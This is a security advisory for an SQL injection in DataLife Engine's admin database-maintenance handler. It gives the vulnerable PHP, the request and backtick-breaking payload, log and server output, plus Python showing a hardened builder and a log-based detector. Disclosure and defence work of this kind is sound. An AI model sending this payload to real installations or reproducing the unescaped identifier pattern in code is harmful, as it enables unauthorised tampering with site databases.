DataLife Engine (DLE) SQL Injection, versions <= 17.1
Request 1 (whattodo=optimize; requires an authenticated administrator session, as the PR:H in the vector below reflects; session cookies omitted):
Code:
POST /admin.php?mod=dboption&action=dboption HTTP/1.1
Host: 192.168.147.131
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded

ta[]=dle_admin_logs&whattodo=optimize
Request 2 (whattodo=repair; same session requirement):
Code:
POST /admin.php?mod=dboption&action=dboption HTTP/1.1
Host: 192.168.147.131
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded

ta[]=dle_admin_logs&whattodo=repair
Vulnerable code (admin.php, mod=dboption handler):
Code:
if( $action == "dboption" AND is_array($_REQUEST['ta']) AND count( $_REQUEST['ta'] ) ) {
    $arr = $_REQUEST['ta'];
    reset( $arr );
    $tables = "";
    // Each user-supplied table name is passed through safesql() and then
    // wrapped in backticks; safesql() does not escape the backtick itself.
    foreach ($arr as $val ) {
        $tables .= ", `" . $db->safesql( $val ) . "`";
    }
    $tables = substr( $tables, 1 );   // drop the leading comma
    if( $_REQUEST['whattodo'] == "optimize" ) {
        // InnoDB installs get ANALYZE TABLE, anything else OPTIMIZE TABLE
        $row = $db->super_query("SHOW TABLE STATUS WHERE Name = '" . PREFIX . "_post'");
        $storage_engine = $row['Engine'];
        if ( strtolower($storage_engine) == "innodb" ) {
            $query = "ANALYZE TABLE ";
        } else $query = "OPTIMIZE TABLE ";
    } else {
        // any value of whattodo other than "optimize" falls through to REPAIR TABLE
        $query = "REPAIR TABLE ";
    }
    $query .= $tables;   // request-controlled identifiers appended verbatim
    $db->query( "INSERT INTO " . USERPREFIX . "_admin_logs (name, date, ip, action, extras) values ('".$db->safesql($member_id['name'])."', '{$_TIME}', '{$_IP}', '23', '')" );
    if( $db->query( $query ) ) {
        msg( "success", $lang['db_ok'], $lang['db_ok_1'], "?mod=dboption" );
    } else {
        msg( "error", $lang['db_err'], $lang['db_err_1'], "?mod=dboption" );
    }
}
Problem:
The backtick (`) is not escaped, so a submitted table name can close the backtick-quoted identifier and append its own SQL to the statement sent to the database. safesql() is a string-literal escaper: it leaves the backtick, MySQL's identifier quote, untouched, and here the value is used as an identifier rather than as a string literal, so the call gives no protection:
Code:
foreach ($arr as $val ) {
    $tables .= ", `" . $db->safesql( $val ) . "`";
}
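The Python below is an added example, not code from DataLife Engine or from this advisory. It models the identifier construction above (safesql() is modelled as MySQL string-literal escaping, which is an assumption about its behaviour) next to a hardened builder that allowlists table names against a known set and doubles embedded backticks. Running it shows the benign request and the payload from this advisory producing exactly the statements discussed, and the hardened version rejecting the payload. The table set KNOWN_TABLES and the helper names are made up for the example.

```python
"""Vulnerable vs. hardened table-name handling for a DLE-style dboption
handler. Added example; not code from DataLife Engine or this advisory."""

# Assumption: safesql() behaves like MySQL string-literal escaping
# (mysqli_real_escape_string): these characters, and only these, are escaped.
# The backtick, MySQL's identifier quote, is deliberately not in the table.
_LITERAL_ESCAPES = {
    "\0": "\\0", "\n": "\\n", "\r": "\\r", "\\": "\\\\",
    "'": "\\'", '"': '\\"', "\x1a": "\\Z",
}

VALID_ACTIONS = ("optimize", "repair")


def safesql(value: str) -> str:
    """String-literal escaper: useless for a value placed inside backticks."""
    return "".join(_LITERAL_ESCAPES.get(ch, ch) for ch in value)


def _verb(whattodo: str, engine: str) -> str:
    """Pick the statement the same way the original handler does."""
    if whattodo == "optimize":
        return "ANALYZE TABLE " if engine.lower() == "innodb" else "OPTIMIZE TABLE "
    return "REPAIR TABLE "   # original: any other value means repair


def build_query_vulnerable(tables, whattodo, engine="InnoDB"):
    """Mirrors the original: safesql() then wrap in backticks, join with commas."""
    joined = ", ".join("`" + safesql(t) + "`" for t in tables)
    return _verb(whattodo, engine) + joined


def quote_identifier(name: str) -> str:
    """Correct MySQL identifier quoting: double every embedded backtick, so the
    value can never close the quote it is placed in."""
    return "`" + name.replace("`", "``") + "`"


def build_query_hardened(tables, whattodo, known_tables, engine="InnoDB"):
    """Allowlist first (names must exist in the schema, e.g. taken from SHOW
    TABLES), quote properly second, reject unknown actions instead of defaulting."""
    if whattodo not in VALID_ACTIONS:
        raise ValueError(f"unknown action {whattodo!r}")
    unknown = [t for t in tables if t not in known_tables]
    if unknown:
        raise ValueError(f"unknown table(s): {unknown!r}")
    joined = ", ".join(quote_identifier(t) for t in tables)
    return _verb(whattodo, engine) + joined


def hardened_rejects(tables, whattodo, known_tables) -> bool:
    """True if the hardened builder refuses the request."""
    try:
        build_query_hardened(tables, whattodo, known_tables)
    except ValueError:
        return True
    return False


# Constructed inputs: the benign request and the payload from this advisory.
KNOWN_TABLES = frozenset({"dle_admin_logs", "dle_post", "dle_users"})   # made-up schema
BENIGN = ["dle_admin_logs"]
PAYLOAD = ["dle_admin_logs` UPDATE HISTOGRAM ON date;#"]

if __name__ == "__main__":
    print(build_query_vulnerable(BENIGN, "optimize"))
    print(build_query_vulnerable(PAYLOAD, "optimize"))   # identifier closed, clause appended
    print(build_query_hardened(BENIGN, "optimize", KNOWN_TABLES))
    print("hardened rejects payload:", hardened_rejects(PAYLOAD, "optimize", KNOWN_TABLES))
    print(quote_identifier(PAYLOAD[0]))   # without the allowlist it still stays one identifier
```

The allowlist is the real fix: the admin panel already knows which tables exist, so the request only needs to pick from that list. Backtick doubling is defence in depth for the case where a name must be quoted dynamically; note that it turns the payload into a single, non-existent table name rather than a second clause.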
Impact:
The request controls the tail of the maintenance statement (ANALYZE, OPTIMIZE or REPAIR TABLE, depending on whattodo and the storage engine). With whattodo=optimize on an InnoDB installation the statement is ANALYZE TABLE, so the injected tail can add an UPDATE HISTOGRAM clause; the trailing # comments out the closing backtick the application appends:
Code:
ta[]=dle_admin_logs` UPDATE HISTOGRAM ON date;#&whattodo=optimize
Statement as recorded in the MySQL general log:
Code:
2024-05-15T15:16:28.523068Z 14805 Query ANALYZE TABLE `dle_admin_logs` UPDATE HISTOGRAM ON date;#`
Server response:
Code:
+-----------------------+-----------+----------+-------------------------------------------------+
| Table | Op | Msg_type | Msg_text |
+-----------------------+-----------+----------+-------------------------------------------------+
| dle_db.dle_admin_logs | histogram | status | Histogram statistics created for column 'date'. |
+-----------------------+-----------+----------+-------------------------------------------------+
Breaking out of the backtick-quoted identifier and appending clauses such as UPDATE HISTOGRAM changes what the maintenance statement does, so the impact is to integrity (I:L in the vector below); exploitation requires an administrator account (PR:H), which keeps the score low.
CVSS: AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N (2.7) Low
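For defenders, the general-log line above is enough to build a check. The Python below is an added example (not DLE code and not part of the original advisory) that parses MySQL general-log Query lines and flags any ANALYZE/OPTIMIZE/REPAIR TABLE statement whose table list is not a plain comma-separated list of backtick-quoted identifiers. The sample log is constructed: it contains the flagged line from this advisory plus benign and malicious lines written for the example. The general-log layout is assumed to be timestamp, thread id, command, argument, whitespace-separated, with one statement per line.

```python
"""Flag maintenance statements with a tampered table list in MySQL general-log
output. Added example; not DataLife Engine code."""
import re

# Assumed general-log layout: <timestamp> <thread_id> <command> <argument>
_LOG_LINE = re.compile(r"^(\S+)\s+(\d+)\s+(\w+)\s+(.*)$")

# ANALYZE/OPTIMIZE/REPAIR TABLE, with the optional binlog modifiers MySQL allows.
_MAINT = re.compile(
    r"^(ANALYZE|OPTIMIZE|REPAIR)\s+(?:NO_WRITE_TO_BINLOG\s+|LOCAL\s+)?TABLE\s+(.*)$",
    re.IGNORECASE,
)

# A legitimate table list from the admin panel: backtick-quoted identifiers
# (embedded backticks doubled) separated by commas and nothing else,
# optionally followed by a semicolon.
_IDENT = r"`(?:[^`]|``)+`"
_TABLE_LIST = re.compile(rf"^\s*{_IDENT}(?:\s*,\s*{_IDENT})*\s*;?\s*$")


def is_clean_table_list(tail: str) -> bool:
    """True if `tail` is only quoted identifiers and commas."""
    return _TABLE_LIST.match(tail) is not None


def find_suspicious(log_text: str):
    """Return (thread_id, statement) for every maintenance statement whose
    tail contains anything beyond the expected identifier list."""
    hits = []
    for line in log_text.splitlines():
        m = _LOG_LINE.match(line)
        if not m or m.group(3) != "Query":
            continue
        thread_id, statement = m.group(2), m.group(4)
        q = _MAINT.match(statement)
        if q and not is_clean_table_list(q.group(2)):
            hits.append((thread_id, statement))
    return hits


# Constructed sample: the second line is the one from this advisory; the
# others were written for this example.
SAMPLE_LOG = """\
2024-05-15T15:16:28.511009Z 14805 Query INSERT INTO dle_admin_logs (name, date, ip, action, extras) values ('admin', '1715786188', '192.168.147.1', '23', '')
2024-05-15T15:16:28.523068Z 14805 Query ANALYZE TABLE `dle_admin_logs` UPDATE HISTOGRAM ON date;#`
2024-05-15T15:20:01.000000Z 14810 Query OPTIMIZE TABLE `dle_post`, `dle_comments`
2024-05-15T15:21:44.000000Z 14811 Query REPAIR TABLE `dle_users`
2024-05-15T15:25:09.000000Z 14812 Query ANALYZE TABLE `dle_post` UPDATE HISTOGRAM ON date;#`
"""

if __name__ == "__main__":
    for thread_id, stmt in find_suspicious(SAMPLE_LOG):
        print(f"thread {thread_id}: {stmt}")
```

The check is deliberately structural rather than keyword-based: instead of looking for UPDATE HISTOGRAM, it asks whether the statement is anything other than a bare identifier list, which also catches tails this advisory does not show. The same rule can be applied in the application itself before the statement is ever sent.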